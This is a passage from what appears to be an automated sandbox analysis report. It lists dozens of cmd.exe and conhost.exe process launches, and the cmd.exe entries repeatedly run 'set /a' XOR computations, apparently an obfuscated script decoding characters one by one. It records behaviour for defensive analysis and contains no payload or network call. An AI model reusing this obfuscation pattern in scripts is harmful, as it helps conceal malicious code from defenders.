                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "195^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:51
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:52
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "133^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:53
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:54
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:55
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:56
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "157^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:57
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:58
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:59
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:60
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "216^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:61
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:62
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:63
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:64
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:65
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:66
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "201^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:67
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:68
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "137^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
Has exited:false

Target ID:69
Start time:06:02:26
Start date:30/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:70
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:71
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:72
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:73
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:74
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:75
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:76
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:77
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:78
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:79
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:80
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:81
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:82
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:83
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:84
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "157^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:85
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:86
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "145^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:87
Start time:06:02:27
Start date:30/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:88
Start time:06:02:28
Start date:30/09/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "216^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:89
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:90
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:91
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:92
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:93
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:94
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "157^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:95
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:96
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:97
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:98
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "193^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:99
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:100
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:101
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:102
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:103
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:104
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "157^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:105
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:106
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:107
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:108
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "216^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:109
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:110
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:111
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
